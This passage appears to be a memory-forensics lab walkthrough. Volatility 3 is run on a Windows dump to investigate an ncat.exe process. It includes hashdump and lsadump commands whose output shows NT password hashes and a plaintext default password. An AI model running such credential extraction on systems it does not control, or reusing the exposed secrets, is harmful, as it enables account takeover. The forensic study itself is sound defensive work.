4260  ncat.exe  0x14a4810  USERDOMAIN_ROAMINGPROFILE  SECURITYNIK-WIN
4260  ncat.exe  0x14a4810  USERNAME  SecurityNik
4260  ncat.exe  0x14a4810  USERPROFILE  C:\Users\SecurityNik
4260  ncat.exe  0x14a4810  user_aliases  C:\Tools\Cmder\config\user_aliases.cmd
4260  ncat.exe  0x14a4810  USER_BUILD  windows.1
4260  ncat.exe  0x14a4810  USER_MAJOR  2
4260  ncat.exe  0x14a4810  USER_MINOR  34
4260  ncat.exe  0x14a4810  USER_PATCH  1
4260  ncat.exe  0x14a4810  VENDORED_BUILD  windows.1
4260  ncat.exe  0x14a4810  VENDORED_MAJOR  2
4260  ncat.exe  0x14a4810  VENDORED_MINOR  29
4260  ncat.exe  0x14a4810  VENDORED_PATCH  1
4260  ncat.exe  0x14a4810  verbose_output  0
...
Getting information on the user and the permissions the ncat.exe process is running with.
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getsids.GetSIDs --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  SID  Name
4260  ncat.exe  S-1-5-21-3036856633-148622980-1367235899-1001  SecurityNik
4260  ncat.exe  S-1-5-21-3036856633-148622980-1367235899-513  Domain Users
4260  ncat.exe  S-1-1-0  Everyone
4260  ncat.exe  S-1-5-114  Local Account (Member of Administrators)
4260  ncat.exe  S-1-5-32-544  Administrators
4260  ncat.exe  S-1-5-32-545  Users
4260  ncat.exe  S-1-5-4  Interactive
4260  ncat.exe  S-1-2-1  Console Logon (Users who are logged onto the physical console)
4260  ncat.exe  S-1-5-11  Authenticated Users
4260  ncat.exe  S-1-5-15  This Organization
4260  ncat.exe  S-1-5-113  Local Account
4260  ncat.exe  S-1-5-5-0-184823  Logon Session
4260  ncat.exe  S-1-2-0  Local (Users with the ability to log in locally)
4260  ncat.exe  S-1-5-64-10  NTLM Authentication
4260  ncat.exe  S-1-16-12288  High Mandatory Level
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.privileges.Privs --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Value Privilege Attributes Description 4260 ncat.exe 2 SeCreateTokenPrivilege Create a token object 4260 ncat.exe 3 SeAssignPrimaryTokenPrivilege Replace a process-level token 4260 ncat.exe 4 SeLockMemoryPrivilege Lock pages in memory 4260 ncat.exe 5 SeIncreaseQuotaPrivilege Present Increase quotas 4260 ncat.exe 6 SeMachineAccountPrivilege Add workstations to the domain 4260 ncat.exe 7 SeTcbPrivilege Act as part of the operating system 4260 ncat.exe 8 SeSecurityPrivilege Present Manage auditing and security log 4260 ncat.exe 9 SeTakeOwnershipPrivilege Present Take ownership of files/objects 4260 ncat.exe 10 SeLoadDriverPrivilege Present Load and unload device drivers 4260 ncat.exe 11 SeSystemProfilePrivilege Present Profile system performance 4260 ncat.exe 12 SeSystemtimePrivilege Present Change the system time 4260 ncat.exe 13 SeProfileSingleProcessPrivilege Present Profile a single process 4260 ncat.exe 14 SeIncreaseBasePriorityPrivilege Present Increase scheduling priority 4260 ncat.exe 15 SeCreatePagefilePrivilege Present Create a pagefile 4260 ncat.exe 16 SeCreatePermanentPrivilege Create permanent shared objects 4260 ncat.exe 17 SeBackupPrivilege Present Backup files and directories 4260 ncat.exe 18 SeRestorePrivilege Present Restore files and directories 4260 ncat.exe 19 SeShutdownPrivilege Present Shut down the system 4260 ncat.exe 20 SeDebugPrivilege Present Debug programs 4260 ncat.exe 21 SeAuditPrivilege Generate security audits 4260 ncat.exe 22 SeSystemEnvironmentPrivilege Present Edit firmware environment values 4260 ncat.exe 23 SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories 4260 ncat.exe 24 SeRemoteShutdownPrivilege Present Force shutdown from a remote system 4260 ncat.exe 25 
SeUndockPrivilege Present Remove computer from docking station 4260 ncat.exe 26 SeSyncAgentPrivilege Synch directory service data 4260 ncat.exe 27 SeEnableDelegationPrivilege Enable user accounts to be trusted for delegation 4260 ncat.exe 28 SeManageVolumePrivilege Present Manage the files on a volume 4260 ncat.exe 29 SeImpersonatePrivilege Present,Enabled,Default Impersonate a client after authentication 4260 ncat.exe 30 SeCreateGlobalPrivilege Present,Enabled,Default Create global objects 4260 ncat.exe 31 SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller 4260 ncat.exe 32 SeRelabelPrivilege Modify the mandatory integrity level of an object 4260 ncat.exe 33 SeIncreaseWorkingSetPrivilege Present Allocate more memory for user applications 4260 ncat.exe 34 SeTimeZonePrivilege Present Adjust the time zone of the computer's internal clock 4260 ncat.exe 35 SeCreateSymbolicLinkPrivilege Present Required to create a symbolic link 4260 ncat.exe 36 SeDelegateSessionUserImpersonatePrivilege Present Obtain an impersonation token for another user in the same session.
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.handles.Handles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Offset  HandleValue  Type  GrantedAccess  Name
...
4260  ncat.exe  0xd187c1e33d30  0x94  File  0x100020  \Device\HarddiskVolume2\Users\SecurityNik
...
4260  ncat.exe  0xd187c13b76e0  0x1f8  Event  0x1f0003
4260  ncat.exe  0xd187c1e34690  0x1fc  File  0x120089  \Device\NamedPipe\
4260  ncat.exe  0xd187c1e34500  0x204  File  0x120196  \Device\NamedPipe
4260  ncat.exe  0xd187c1e34820  0x208  File  0x120089  \Device\NamedPipe\ncat-0
4260  ncat.exe  0xd187c10dd400  0x210  Mutant  0x1f0001
4260  ncat.exe  0xd187c1bc6080  0x214  Process  0x1fffff  ncat.exe Pid 4500
...
USER\S-1-5-21-3036856633-148622980-1367235899-1001\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION
4260  ncat.exe  0xd187c1f5ef60  0x228  Event  0x1f0003
4260  ncat.exe  0xd187c13b8de0  0x22c  Event  0x1f0003
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
User  rid  lmhash  nthash
Administrator  500  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0
Guest  501  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount  503  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount  504  aad3b435b51404eeaad3b435b51404ee  c2622233208f902795d9ad5bde22b628
SecurityNik  1001  aad3b435b51404eeaad3b435b51404ee  23e1d10001876b0078a9a779017fc026
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.lsadump.Lsadump Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Key Secret Hex DefaultPassword Testing1%òvÌBhúmÃfTî 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 25 f2 1f 76 83 cc a0 08 42 68 fa 6d c3 66 54 ee DPAPI_SYSTEM ,ÀC³▒N#0t"íãܺÈÕÿs/É▒I[ÌÕؤqôUMn 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 c0 43 b3 1a 05 9e 4e 23 30 74 22 9b e6 ed e3 dc ba c8 1d d5 ff 73 9c 2f c9 1a 49 0f 5b cc d5 d8 7f a4 94 71 f4 55 4d 6e 00 00 00 00 L$_RasConnectionCredentials#0 88[`Þ6Ù5N½Â§^)nTesting1 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 05 00 5b 60 de 36 d9 98 35 4e bd c2 a7 15 5e 81 29 6e 12 00 00 00 54 00 65 00 73 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 NL$KM @×çs¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.verinfo.VerInfo | more
Volatility 3 Framework 2.0.2
PDB scanning finished
PID  Process  Base  Name  Major  Minor  Product  Build
...
4260  ncat.exe  0x730000  ncat.exe  -  -  -  -
4260  ncat.exe  0x7ffe2ab70000  ntdll.dll  -  -  -  -
4260  ncat.exe  0x7ffe2a810000  wow64.dll  -  -  -  -
4260  ncat.exe  0x7ffe29950000  wow64win.dll  -  -  -  -
4260  ncat.exe  0x771d0000  wow64cpu.dll  -  -  -  -
...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.vadinfo.VadInfo --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Offset Start VPN End VPN Tag Protection CommitCharge PrivateMemory Parent File File output 4260 ncat.exe 0xd187bfeeaad0 0x75c20000 0x75e33fff Vad PAGE_EXECUTE_WRITECOPY 28 0 0x0 \Windows\SysWOW64\KernelBase.dll Disabled 4260 ncat.exe 0xd187c1c83e40 0x14a0000 0x14affff VadS PAGE_READWRITE 11 1 0xffffd187bfeeaad0 N/A Disabled ... 4260 ncat.exe 0xd187c1fac350 0x730000 0x8d0fff Vad PAGE_EXECUTE_WRITECOPY 18 0 0xffffd187bfeeac10 \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe Disabled ... 0xffffd187c01f7a60 \Windows\SysWOW64\pcapwsp.dll Disabled 4260 ncat.exe 0xd187c01f8050 0x3d40000 0x3e3ffff VadS PAGE_READWRITE 4 1 0xffffd187bceac5a0 N/A Disabled ... 4260 ncat.exe 0xd187c1c7cc30 0x7ffe7000 0x7ffe7fff VadS PAGE_READONLY 1 1 0xffffd187c1fb03b0 N/A Disabled 4260 ncat.exe 0xd187c1c82e00 0x7f290000 0x7f291fff VadS PAGE_READWRITE 1 1 0xffffd187c1c7cc30 N/A Disabled 4260 ncat.exe 0xd187bfeedc30 0x7f150000 0x7f24ffff Vad PAGE_READONLY 0 0 0xffffd187c1c82e00 N/A Disabled 4260 ncat.exe 0xd187c158d7d0 0x7e110000 0x7e17afff Vad PAGE_EXECUTE_WRITECOPY 18 0 ... 4260 ncat.exe 0xd187c1faf730 0x7ffe2ab70000 0x7ffe2ad64fff Vad PAGE_EXECUTE_WRITECOPY 16 0 0xffffd187c10da7f0 \Windows\System32\ntdll.dll Disabled .......
Getting information on existing services.
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.svcscan.SvcScan | more
Volatility 3 Framework 2.0.2
PDB scanning finished
Offset  Order  PID  Start  State  Type  Name  Display  Binary
0x1887f463cf0  399  0  SERVICE_AUTO_START  SERVICE_RUNNING  SERVICE_WIN32_SHARE_PROCESS  RpcEptMapper  RPC Endpoint Mapper  -
0x1887f463d00  398  N/A  SERVICE_DEMAND_START  SERVICE_STOPPED  SERVICE_WIN32_OWN_PROCESS  rpcapd  rpcapd  N/A
0x1887f463960  397  N/A  SERVICE_DEMAND_START  SERVICE_STOPPED  SERVICE_WIN32_SHARE_PROCESS  RmSvc  RmSvc  N/A
0x1887f463ed0  396  N/A  SERVICE_DEMAND_START  SERVICE_STOPPED  SERVICE_KERNEL_DRIVER  rhproxy  rhproxy  N/A
0x1887f468b10  395  N/A  SERVICE_DEMAND_START  SERVICE_STOPPED  SERVICE_KERNEL_DRIVER  RFCOMM  RFCOMM  N/A
...
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getservicesids.GetServiceSIDs | more Volatility 3 Framework 2.0.2 PDB scanning finished SID Service S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865 .NET CLR Networking 4.0.0.0 S-1-5-80-1135273183-3738781202-689480478-891280274-255333391 .NET Memory Cache 4.0 S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036 AarSvc_2ea6a S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179 AcpiDev S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408 acpipagr ....
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm 4260 ncat.exe 0xf40000 0xf40fff VadS PAGE_EXECUTE_READWRITE|PAGE_NOCACHE 1 1 Disabled 68 90 4f 25 77 9c 60 68 h.O%w.`h 14 00 f4 00 e8 5f b7 e0 ....._.. 74 61 9d c3 43 00 3a 00 ta..C.:. 5c 00 54 00 6f 00 6f 00 \.T.o.o. 6c 00 73 00 5c 00 43 00 l.s.\.C. 6d 00 64 00 65 00 72 00 m.d.e.r. 5c 00 76 00 65 00 6e 00 \.v.e.n. 64 00 6f 00 72 00 5c 00 d.o.r.\. 0xf40000: push 0x77254f90 0xf40005: pushfd 0xf40006: pushal 0xf40007: push 0xf40014 0xf4000c: call 0x75d4b770 ...
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Skeleton Key Found  rc4HmacInitialize  rc4HmacDecrypt
612  lsass.exe  False  0x7ffe279d63c0  0x7ffe279d6800
Peeking into the userassist.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.userassist.UserAssist | more Volatility 3 Framework 2.0.2 PDB scanning finished Hive Offset Hive Name Path Last Write Time Type Name ID Count Focus Count Time Focused Last Updated Raw D ata 0xe50a50363000 hive0xe50a50363000 - - - - - - - - - - 0xe50a5048a000 hive0xe50a5048a000 - - - - - - - - - - 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC 14-11DF-BB8C-A2F1DED72085}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E 61-4557-8FC7-0028EDCEEBF6}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A8 25-4A09-82B9-EEC22AA3B847}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4D DD-48FF-BB0B-D3190DACB3E2}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-47 92-41A5-9909-6A6A8D32490E}\Count 2021-12-23 15:09:55.000000 Key N/A N/A N/A N/A N/A N/A N/A 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-AC E2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Key N/A N/A N/A N/A N/A N/A N/A * 0xe50a53827000 \??\C:\Users\SecurityNik\ntuser.dat ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEB FF5CD-ACE2-4F4F-9178-9926F41749EA}\Count 2022-02-25 18:21:12.000000 Value 
UEME_CTLCUACount:ctor N/A 0 0 0:00: 00.500000 N/A ff ff ff ff 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ 00 00 80 bf 00 00 80 bf ........ ff ff ff ff 00 00 00 00 ........ 00 00 00 00 00 00 00 00 ........ ...
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.poolscanner.PoolScanner | grep -i ncat
symbol_table_name1!_EPROCESS  0xd187c11a5000inlayer_name  ncat.exe
symbol_table_name1!_FILE_OBJECT  0xd187c14adcf0  layer_name  \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe
symbol_table_name1!_EPROCESS  0xd187c1af3000  layer_name  ncat.exe
symbol_table_name1!_FILE_OBJECT  0xd187c1e11b60  layer_name  \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT  0xd187c1e27960  layer_name  \Windows\Prefetch\NCAT.EXE-4B4B887F.pf
symbol_table_name1!_FILE_OBJECT  0xd187c1e2a200  layer_name  \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT  0xd187c1e326d0  layer_name  \Windows\Prefetch\NCAT.EXE-1B3976EF.pf
symbol_table_name1!_FILE_OBJECT  0xd187c1e347a0  layer_name  \ncat-0
symbol_table_name1!_FILE_OBJECT  0xd187c1e34930  layer_name  \ncat-0
Extracting certificate information.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.certificates.Certificates | more Volatility 3 Framework 2.0.2 PDB scanning finished Certificate path Certificate section Certificate ID Certificate name Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot AutoUpdate - Microsoft\SystemCertificates AuthRoot 02FAF3E291435468607857694DF5E45B68851868 Sectigo (AddTrust) Microsoft\SystemCertificates AuthRoot 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 DigiCert Microsoft\SystemCertificates AuthRoot 07E032E020B72C3F192F0628A2593A19A70F069E Certum Trusted Network CA Microsoft\SystemCertificates AuthRoot 2796BAE63F1801E277261BA0D77770028F20EEE4 Go Daddy Class 2 Certification Authority Microsoft\SystemCertificates AuthRoot 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Sectigo Microsoft\SystemCertificates AuthRoot 3679CA35668772304D30A5FB873B0FA77BB70D54 VeriSign Universal Root Certification Authori ty
noice